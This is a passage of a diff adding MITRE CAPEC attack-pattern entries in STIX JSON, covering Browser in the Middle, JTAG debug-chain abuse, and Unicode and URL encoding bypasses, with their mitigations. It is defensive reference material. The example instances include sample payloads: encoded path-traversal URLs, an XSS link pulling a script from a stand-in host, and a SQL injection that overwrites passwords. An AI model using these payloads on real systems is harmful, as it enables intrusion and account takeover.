Browser-in-the-Middle (BitM) attack, 2021--04---17", + "external_id": "REF-747", + "source_name": "reference_from_CAPEC", + "url": "https://link.springer.com/article/10.1007/s10207-021-00548-5#citeas" + } + ], + "id": "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Browser in the Middle (BiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: The adversary identifies an application or service that the target is likely to use.

    2. Techniques
    The adversary stands up a server to host the transparent browser and entices victims to use it by using a domain name similar to the legitimate application. In addition to the transparent browser, the adversary could also install a web proxy, sniffer, keylogger, and other tools to assist in their goals.

Experiment

  1. Lure victims: The adversary crafts a phishing campaign to lure unsuspecting victims into using the transparent browser.

    2. Techniques
    An adversary can create a convincing email with a link to download the web client and interact with the transparent browser.

Exploit

  1. Monitor and Manipulate Data: When the victim establishes the connection to the transparent browser, the adversary can view victim activity and make alterations to what the victim sees when browsing the web.

    2. Techniques
    Once a victim has established a connection to the transparent browser, the adversary can use installed tools such as a web proxy, keylogger, or additional malicious browser extensions to gather and manipulate data or impersonate the victim.
", + "x_capec_extended_description": "\n Unlike Adversary in the Browser, the victim does not need to install a malicious application. Browser in the Middle uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary. These victim-authenticated sessions are available to the adversary to use. All entered data such as passwords and usernames can be logged by the adversary and the content displayed to the victim can be altered arbitrarily. Varieties of multifactor authentication which rely solely on user input and do not use a form of hardware-based secret exchange are vulnerable to browser in the middle.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must create a convincing web client to establish the connection. The victim then needs to be lured onto the adversary's webpage. In addition, the victim's machine must not use local authentication APIs, a hardware token, or a Trusted Platform Module (TPM) to authenticate." + ], + "x_capec_resources_required": [ + "A web application with a client is needed to enable the victim's browser to establish a remote desktop connection to the system of the adversary." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strong, mutual authentication to fully authenticate with both ends of any communications channel", + "id": "course-of-action--4d1e1950-0107-428d-bcd1-90b10a8f7261", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-701-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f73294e-ddd9-4448-b3fe-3de0d2ee4051", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d1e1950-0107-428d-bcd1-90b10a8f7261", + "target_ref": "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits incorrect chaining or granularity of hardware debug components in order to gain unauthorized access to debug functionality on a chip. This happens when authorization is not checked on a per function basis and is assumed for a chain or group of debug functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-702", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/702.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "description": "Hewlett-Packard Journal, Overview of the Test Access Port, 1994--12", + "external_id": "REF-748", + "source_name": "reference_from_CAPEC", + "url": "https://www.hpl.hp.com/hpjournal/94dec/dec94a7a.pdf" + }, + { + "description": "Finding Faults with the Test Access Port (TAP), 2017--06---12", + "external_id": "REF-749", + "source_name": "reference_from_CAPEC", + "url": "https://flynn.com/2017/06/12/finding-faults-with-the-test-access-port-tap/" + }, + { + "description": "Technical Guide to JTAG", + "external_id": "REF-750", + "source_name": "reference_from_CAPEC", + "url": "https://www.xjtag.com/about-jtag/jtag-a-technical-overview/" + } + ], + "id": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploiting Incorrect Chaining or Granularity of Hardware Debug Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A System-on-Chip (SoC) might give regular users access to the SoC-level TAP, but does not want to give access to all of the internal TAPs (e.g., Core). If any of the internal TAPs were incorrectly chained to the SoC-level TAP, this would grant regular users access to the internal TAPs and allow them to execute commands there.\n ", + "\n Suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented, and the attacker can gain unauthorized access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find and scan debug interface: The adversary must first find and scan a debug interface to determine what they are authorized to use and what devices are chained to that interface.

    2. Techniques
    Use a JTAGulator on a JTAG interface to determine the correct pin configuration, baud rate, and number of devices in the chain

Experiment

  1. Connect to debug interface: The adversary next connects a device to the JTAG interface using the properties found in the explore phase so that they can send commands. The adversary sends some test commands to make sure the connection is working.

    2. Techniques
    Connect a device such as a BusPirate or UM232H to the JTAG interface and connect using pin layout found from the JTAGulator

Exploit

  1. Move along debug chain: Once the adversary has connected to the main TAP, or JTAG interface, they will move along the TAP chain to see what debug interfaces might be available on that chain.

    2. Techniques
    Run a command such as “scan_chain” to see what TAPs are available in the chain.
", + "x_capec_extended_description": "\n Chip designers often include design elements in a chip for debugging and troubleshooting such as:\n \n Various Test Access Ports (TAPs) which allow boundary scan commands to be executed.\n Scan cells that allow the chip to be used as a \"stimulus and response\" mechanism for scanning the internal components of a chip.\n Custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.\n \n Because devices commonly have multiple chips and debug components, designers will connect debug components and expose them through a single external interface, which is referred to as “chaining”. Logic errors during design or synthesis could misconfigure the chaining of the debug components, which could allow unintended access. TAPs are also commonly referred to as JTAG interfaces.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Hardware device has an exposed debug interface" + ], + "x_capec_resources_required": [ + "A device to scan a TAP or JTAG interface, such as a JTAGulator", + "A device to communicate on a TAP or JTAG interface, such as a BusPirate" + ], + "x_capec_skills_required": { + "Medium": "Ability to operate devices to scan and connect to an exposed debug interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Ensure that debug components are properly chained, and their granularity is maintained at different authorization levels", + "id": "course-of-action--17433e7e-fe6b-4e63-98b3-d9236f49e962", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3151d214-5a9a-4841-a00e-2ece44eb4f6c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17433e7e-fe6b-4e63-98b3-d9236f49e962", + "target_ref": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform Post-silicon validation tests at various authorization levels to ensure that debug components are only accessible to authorized users", + "id": "course-of-action--d0fd8185-9442-4860-bd79-71c0084cedc7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--243e1c46-2598-4972-a1a7-e1fb53ec2ffe", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0fd8185-9442-4860-bd79-71c0084cedc7", + "target_ref": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", + "external_references": [ + { + "external_id": "CAPEC-71", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/71.html" + }, + { + "external_id": "CWE-176", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/176.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Unicode Encoding", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Unicode_Encoding" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unicode Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Try to use Unicode encoding of content in Scripts in order to bypass validation routines.
    Try to use Unicode encoding of content in HTML in order to bypass validation routines.
    Try to use Unicode encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Filtering is performed on data that has not be properly canonicalized." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", + "id": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7431af74-11f2-4cf7-aa2d-aa0b07ff9256", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that filtering or input validation is applied to canonical data.", + "id": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--caeb99db-8036-444d-a785-c9ac795a3cf9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25524460-3133-4541-a10d-84d3fd8a1db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.", + "external_references": [ + { + "external_id": "CAPEC-72", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/72.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "modified": "2022-09-29T00:00:00.000Z", + "name": "URL Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n URL Encodings in IceCast MP3 Server.\n The following type of encoded string has been known traverse directories against the IceCast MP3 server9:\n http://[targethost]:8000/somefile/%2E%2E/target.mp3\n or using\n \"/%25%25/\" instead of \"/../\".\n The control character \"..\" can be used by an adversary to escape the document root.See also: CVE-2001-0784", + "\n Cross-Site Scripting\n \n URL-Encoded attack:http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e\n \n HTML execution:\n [REF-495]\n ", + "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n ", + "\n Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An adversary could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey web application for URLs with parameters: Using a browser, an automated tool or by inspecting the application, an adversary records all URLs that contain parameters.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.

Experiment

  1. Probe URLs to locate vulnerabilities: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and tests parameters with different encodings of special characters to see how the web application will handle them.

    2. Techniques
    Use URL encodings of special characters such as semi-colons, backslashes, or question marks that might be filtered out normally.
    Combine the use of URL encodings with other encoding techniques such as the triple dot and escape slashes.

Exploit

  1. Inject special characters into URL parameters: Using the information gathered in the \"Experiment\" phase, the adversary injects special characters into the URL using URL encoding. This can lead to path traversal, cross-site scripting, SQL injection, etc.

", + "x_capec_extended_description": "\n A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).\n For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An adversary will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL.\n It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The adversary could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an adversary may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application should accepts and decodes URL input.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An adversary can try special characters in the URL and bypass the URL validation.", + "Medium": "The adversary may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e04db14-a140-40e0-aafe-1ec097c9a4d2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a27b504b-7f3c-47fb-ad70-9a9042fe74bd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--506ec38c-6161-4411-b56b-cf20c5960c3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e586d60-d396-45aa-bfa2-afbd31a70dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32ed5b33-4ffc-4a9a-b6bf-f389799a677b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": 